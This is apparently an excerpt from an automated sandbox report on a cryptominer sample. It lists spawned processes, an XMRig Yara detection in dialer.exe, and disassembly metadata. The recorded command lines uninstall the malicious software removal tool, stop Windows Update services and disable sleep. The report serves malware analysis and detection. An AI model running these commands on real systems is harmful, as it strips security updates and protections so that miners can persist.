                                                                              Has exited:true

                                                                              General

                                                                              Target ID:46
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6085f0000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:47
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:48
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:49
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:50
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:51
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:52
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:53
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:54
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:55
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:56
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:57
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:58
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:59
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:60
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:61
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:62
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:63
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:64
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:65
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:66
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:67
                                                                              Start time:04:16:08
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:68
                                                                              Start time:04:16:08
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:69
                                                                              Start time:04:16:08
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:21.8%
                                                                                Total number of Nodes:174
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 1232 7ff72a7b38e0 wcslen 1240 7ff72a7b157b 1232->1240 1241 7ff72a7b1394 2 API calls 1240->1241 1336 7ff72a7b2320 strlen 1337 7ff72a7b2337 1336->1337 1419 7ff72a7b1e65 1420 7ff72a7b1e67 signal 1419->1420 1421 7ff72a7b1e99 1420->1421 1422 7ff72a7b1e7c 1420->1422 1422->1421 1423 7ff72a7b1e82 signal 1422->1423 1423->1421 1242 7ff72a7b15e4 1243 7ff72a7b1394 2 API calls 1242->1243 1244 7ff72a7b15f3 1243->1244 1158 7ff72a7b11d8 1159 7ff72a7b11fa 1158->1159 1160 7ff72a7b1201 _initterm 1159->1160 1161 7ff72a7b121a 1159->1161 1160->1161 1171 7ff72a7b1880 1161->1171 1163 7ff72a7b1247 SetUnhandledExceptionFilter 1164 7ff72a7b126a 1163->1164 1165 7ff72a7b126f malloc 1164->1165 1166 7ff72a7b128b 1165->1166 1167 7ff72a7b12a0 strlen malloc memcpy 1166->1167 1167->1167 1168 7ff72a7b12d0 1167->1168 1169 7ff72a7b132d _cexit 1168->1169 1170 7ff72a7b1338 1168->1170 1169->1170 1172 7ff72a7b18a2 1171->1172 1177 7ff72a7b1a0f 1171->1177 1173 7ff72a7b1956 1172->1173 1176 7ff72a7b199e 1172->1176 1172->1177 1173->1176 1181 7ff72a7b1ba0 1173->1181 1175 7ff72a7b19e9 VirtualProtect 1175->1176 1176->1175 1176->1177 1178 7ff72a7b1b36 1176->1178 1177->1163 1179 7ff72a7b1ba0 4 API calls 1178->1179 1180 7ff72a7b1b53 1179->1180 1180->1177 1184 7ff72a7b1bc2 1181->1184 1182 7ff72a7b1c04 memcpy 1182->1173 1184->1182 1185 7ff72a7b1c45 VirtualQuery 1184->1185 1186 7ff72a7b1cf4 1184->1186 1185->1186 1190 7ff72a7b1c72 1185->1190 1187 7ff72a7b1d23 GetLastError 1186->1187 1189 7ff72a7b1d37 1187->1189 1188 7ff72a7b1ca4 VirtualProtect 1188->1182 1188->1187 1190->1182 1190->1188 1191 7ff72a7b219e 1192 7ff72a7b2272 1191->1192 1193 7ff72a7b21ab EnterCriticalSection 1191->1193 1194 7ff72a7b2265 LeaveCriticalSection 1193->1194 1196 7ff72a7b21c8 1193->1196 1194->1192 1195 7ff72a7b21e9 TlsGetValue GetLastError 1195->1196 1196->1194 1196->1195 1424 7ff72a7b216f 1425 7ff72a7b2185 1424->1425 1426 7ff72a7b2178 InitializeCriticalSection 1424->1426 1426->1425 1427 7ff72a7b1a70 1428 7ff72a7b199e 1427->1428 1428->1427 1429 7ff72a7b19e9 VirtualProtect 1428->1429 1430 7ff72a7b1a0f 1428->1430 1431 7ff72a7b1b36 1428->1431 1429->1427 1429->1428 1432 7ff72a7b1ba0 4 API calls 1431->1432 1432->1430 1197 7ff72a7b1ab3 1199 7ff72a7b199e 1197->1199 1198 7ff72a7b1b36 1200 7ff72a7b1ba0 4 API calls 1198->1200 1199->1197 1199->1198 1201 7ff72a7b19e9 VirtualProtect 1199->1201 1202 7ff72a7b1a0f 1199->1202 1200->1202 1201->1199 1433 7ff72a7b146d 1434 7ff72a7b1394 2 API calls 1433->1434 1251 7ff72a7b65ec 1252 7ff72a7b66e6 wcslen 1251->1252 1253 7ff72a7b65f9 1251->1253 1300 7ff72a7b153f 1252->1300 1253->1252 1301 7ff72a7b1394 2 API calls 1300->1301 1302 7ff72a7b154e 1301->1302 1303 7ff72a7b1394 2 API calls 1302->1303 1304 7ff72a7b1800 1305 7ff72a7b1812 1304->1305 1306 7ff72a7b1835 fprintf 1305->1306 1307 7ff72a7b1000 1308 7ff72a7b108b __set_app_type 1307->1308 1309 7ff72a7b1040 1307->1309 1310 7ff72a7b10b6 1308->1310 1309->1308 1311 7ff72a7b10e5 1310->1311 1313 7ff72a7b1e00 1310->1313 1314 7ff72a7b9fe0 __setusermatherr 1313->1314 1203 7ff72a7b1ac3 1206 7ff72a7b199e 1203->1206 1204 7ff72a7b1b36 1205 7ff72a7b1ba0 4 API calls 1204->1205 1208 7ff72a7b1a0f 1205->1208 1206->1204 1207 7ff72a7b19e9 VirtualProtect 1206->1207 1206->1208 1207->1206 1315 7ff72a7b1404 1316 7ff72a7b1394 2 API calls 1315->1316 1317 7ff72a7b1413 1316->1317 1318 7ff72a7b1394 2 API calls 1317->1318 1319 7ff72a7b2104 1320 7ff72a7b2111 EnterCriticalSection 1319->1320 1325 7ff72a7b2218 1319->1325 1321 7ff72a7b220b LeaveCriticalSection 1320->1321 1326 7ff72a7b212e 1320->1326 1321->1325 1322 7ff72a7b2272 1323 7ff72a7b214d TlsGetValue GetLastError 1323->1326 1324 7ff72a7b2241 DeleteCriticalSection 1324->1322 1325->1322 1325->1324 1326->1321 1326->1323 1344 7ff72a7b653c 1347 7ff72a7b2df0 1344->1347 1355 7ff72a7b2e00 1347->1355 1357 7ff72a7b2690 1355->1357 1390 7ff72a7b155d 1357->1390 1391 7ff72a7b1394 2 API calls 1390->1391 1392 7ff72a7b3352 1393 7ff72a7b33b7 1392->1393 1395 7ff72a7b3579 1393->1395 1397 7ff72a7b3493 wcscpy wcscat wcslen 1393->1397 1403 7ff72a7b145e 2 API calls 1393->1403 1394 7ff72a7b362b wcscpy wcscat wcslen 1396 7ff72a7b1422 2 API calls 1394->1396 1395->1394 1398 7ff72a7b3728 1396->1398 1405 7ff72a7b1422 1397->1405 1400 7ff72a7b3767 1398->1400 1407 7ff72a7b1431 1398->1407 1403->1393 1406 7ff72a7b1394 2 API calls 1405->1406 1408 7ff72a7b1394 2 API calls 1407->1408 1209 7ff72a7b68cf wcslen 1214 7ff72a7b15a8 1209->1214 1216 7ff72a7b1394 1214->1216 1217 7ff72a7b9a50 malloc 1216->1217 1218 7ff72a7b13b8 1217->1218 1219 7ff72a7b13c6 NtFlushKey 1218->1219 1220 7ff72a7b1fd0 1221 7ff72a7b1fe4 1220->1221 1222 7ff72a7b2033 1220->1222 1221->1222 1223 7ff72a7b1ffd EnterCriticalSection LeaveCriticalSection 1221->1223 1223->1222 1327 7ff72a7b1e10 1328 7ff72a7b1e2f 1327->1328 1329 7ff72a7b1ecc 1328->1329 1331 7ff72a7b1eb5 1328->1331 1334 7ff72a7b1e55 1328->1334 1330 7ff72a7b1ed3 signal 1329->1330 1329->1331 1330->1331 1332 7ff72a7b1ee4 1330->1332 1332->1331 1333 7ff72a7b1eea signal 1332->1333 1333->1331 1334->1331 1335 7ff72a7b1f12 signal 1334->1335 1335->1331 1409 7ff72a7b2050 1410 7ff72a7b20cf 1409->1410 1411 7ff72a7b205e EnterCriticalSection 1409->1411 1412 7ff72a7b20c2 LeaveCriticalSection 1411->1412 1413 7ff72a7b2079 1411->1413 1412->1410 1413->1412 1148 7ff72a7b1394 1152 7ff72a7b9a50 1148->1152 1150 7ff72a7b13b8 1151 7ff72a7b13c6 NtFlushKey 1150->1151 1153 7ff72a7b9a6e 1152->1153 1156 7ff72a7b9a9b 1152->1156 1153->1150 1154 7ff72a7b9b43 1155 7ff72a7b9b5f malloc 1154->1155 1157 7ff72a7b9b80 1155->1157 1156->1153 1156->1154 1157->1153 1414 7ff72a7b1f47 1415 7ff72a7b1e67 signal 1414->1415 1417 7ff72a7b1e99 1414->1417 1416 7ff72a7b1e7c 1415->1416 1415->1417 1416->1417 1418 7ff72a7b1e82 signal 1416->1418 1418->1417 1441 7ff72a7b118b 1442 7ff72a7b1190 1441->1442 1443 7ff72a7b11b9 _amsg_exit 1441->1443 1442->1443 1444 7ff72a7b11a0 Sleep 1442->1444 1446 7ff72a7b11fa 1443->1446 1444->1442 1444->1443 1447 7ff72a7b1201 _initterm 1446->1447 1448 7ff72a7b121a 1446->1448 1447->1448 1449 7ff72a7b1880 5 API calls 1448->1449 1450 7ff72a7b1247 SetUnhandledExceptionFilter 1449->1450 1451 7ff72a7b126a 1450->1451 1452 7ff72a7b126f malloc 1451->1452 1453 7ff72a7b128b 1452->1453 1454 7ff72a7b12a0 strlen malloc memcpy 1453->1454 1454->1454 1455 7ff72a7b12d0 1454->1455 1456 7ff72a7b132d _cexit 1455->1456 1457 7ff72a7b1338 1455->1457 1456->1457

                                                                                Executed Functions

                                                                                Function 00007FF72A7B118B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 108sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 2643109117-1582277970
                                                                                • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction ID: ef3b9a227872be29f23e55731316ac3ab6aeafabd45c73852386ac678036e1ec
                                                                                • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction Fuzzy Hash: 2B4160A1A0970685FB00BF15ED50379A761FFADB80FC448B6D91D437A6DF2CA4458F28
                                                                                Function 00007FF72A7B1394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtFlushKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A7B1156), ref: 00007FF72A7B13F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2095626080.00007FF72A7B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72A7B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.2095610218.00007FF72A7B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095648554.00007FF72A7BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095687177.00007FF72A7BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095705358.00007FF72A7BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095920907.00007FF72AA3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095948020.00007FF72AA72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2095966064.00007FF72AA75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff72a7b0000_gem2.jbxd
                                                                                Similarity
                                                                                • API ID: Flush
                                                                                • String ID:
                                                                                • API String ID: 1965063083-0
                                                                                • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction ID: 88b744568f042b305bff506e7b37f05ae301629c6a04b26768ed4768f42fd036
                                                                                • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction Fuzzy Hash: 14F0A4B1908B4582E710EF51FC5502AF760FB69380F505C75E99D46725DF3CE0508F68

                                                                                Non-executed Functions

                                                                                Function 00007FF72A7B65EC Relevance: 23.0, APIs: 12, Strings: 3, Instructions: 489COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 42 7ff72a7b65ec-7ff72a7b65f3 43 7ff72a7b66e6-7ff72a7b6784 wcslen call 7ff72a7b153f call 7ff72a7b145e 42->43 44 7ff72a7b65f9-7ff72a7b66df 42->44 49 7ff72a7b678a-7ff72a7b6791 43->49 50 7ff72a7b680e-7ff72a7b6822 43->50 44->43 49->50 52 7ff72a7b6793-7ff72a7b6804 call 7ff72a7b2f70 call 7ff72a7b39b0 call 7ff72a7b14c7 49->52 53 7ff72a7b6824-7ff72a7b6864 50->53 54 7ff72a7b686b-7ff72a7b688d wcslen 50->54 52->50 66 7ff72a7b6806-7ff72a7b6809 call 7ff72a7b145e 52->66 53->54 58 7ff72a7b6890-7ff72a7b68a0 54->58 64 7ff72a7b68a6-7ff72a7b68ba wcslen 58->64 65 7ff72a7b69ac 58->65 64->58 67 7ff72a7b68bc 64->67 68 7ff72a7b69b0-7ff72a7b69c4 65->68 66->50 67->68 71 7ff72a7b69c6-7ff72a7b6a22 68->71 72 7ff72a7b6a29-7ff72a7b6ae1 wcscpy wcscat call 7ff72a7b2f70 call 7ff72a7b3350 call 7ff72a7b14c7 68->72 71->72 81 7ff72a7b7ec4-7ff72a7b7f06 call 7ff72a7b1370 72->81 82 7ff72a7b6ae7-7ff72a7b6aee 72->82 84 7ff72a7b6af0-7ff72a7b6b30 81->84 91 7ff72a7b7f0c 81->91 82->84 85 7ff72a7b6b37-7ff72a7b6b47 wcslen 82->85 84->85 86 7ff72a7b6b89-7ff72a7b6b8b 85->86 87 7ff72a7b6b49-7ff72a7b6b55 85->87 90 7ff72a7b6b91-7ff72a7b6bbb wcscat 86->90 89 7ff72a7b6b60-7ff72a7b6b70 87->89 94 7ff72a7b6b72-7ff72a7b6b85 wcslen 89->94 95 7ff72a7b6b8d 89->95 96 7ff72a7b7f11-7ff72a7b7f53 call 7ff72a7b1370 90->96 97 7ff72a7b6bc1-7ff72a7b6bc8 90->97 91->85 94->89 98 7ff72a7b6b87 94->98 95->90 100 7ff72a7b6bca-7ff72a7b6c0a 96->100 105 7ff72a7b7f59 96->105 99 7ff72a7b6c11-7ff72a7b6c40 wcscpy wcscat 97->99 97->100 98->90 103 7ff72a7b6c46-7ff72a7b6c4d 99->103 104 7ff72a7b7f5e-7ff72a7b7f84 call 7ff72a7b9840 call 7ff72a7b1370 99->104 100->99 107 7ff72a7b6c53-7ff72a7b6cfd 103->107 108 7ff72a7b6d04-7ff72a7b6d0b 103->108 104->107 122 7ff72a7b7f8a 104->122 105->99 107->108 109 7ff72a7b6d11-7ff72a7b6d18 108->109 110 7ff72a7b7f8f-7ff72a7b7fd3 call 7ff72a7b1370 108->110 112 7ff72a7b6d76-7ff72a7b6d7d 109->112 113 7ff72a7b6d1a-7ff72a7b6d6f 109->113 110->113 123 7ff72a7b7fd9 110->123 116 7ff72a7b6d83-7ff72a7b6d8a 112->116 117 7ff72a7b7fde-7ff72a7b8018 memcpy call 7ff72a7b1370 112->117 113->112 120 7ff72a7b6d90-7ff72a7b6dac 116->120 121 7ff72a7b6eed-7ff72a7b6f8b wcslen call 7ff72a7b153f call 7ff72a7b145e 116->121 117->120 130 7ff72a7b801e 117->130 125 7ff72a7b6db0-7ff72a7b6e08 120->125 133 7ff72a7b7021-7ff72a7b7049 call 7ff72a7b145e 121->133 134 7ff72a7b6f91-7ff72a7b6f98 121->134 122->108 123->112 125->125 128 7ff72a7b6e0a-7ff72a7b6ee6 125->128 128->121 130->121 134->133 136 7ff72a7b6f9e-7ff72a7b7017 call 7ff72a7b2f70 call 7ff72a7b39b0 call 7ff72a7b14c7 134->136 136->133 144 7ff72a7b7019-7ff72a7b701c call 7ff72a7b145e 136->144 144->133
                                                                                APIs
                                                                                Strings
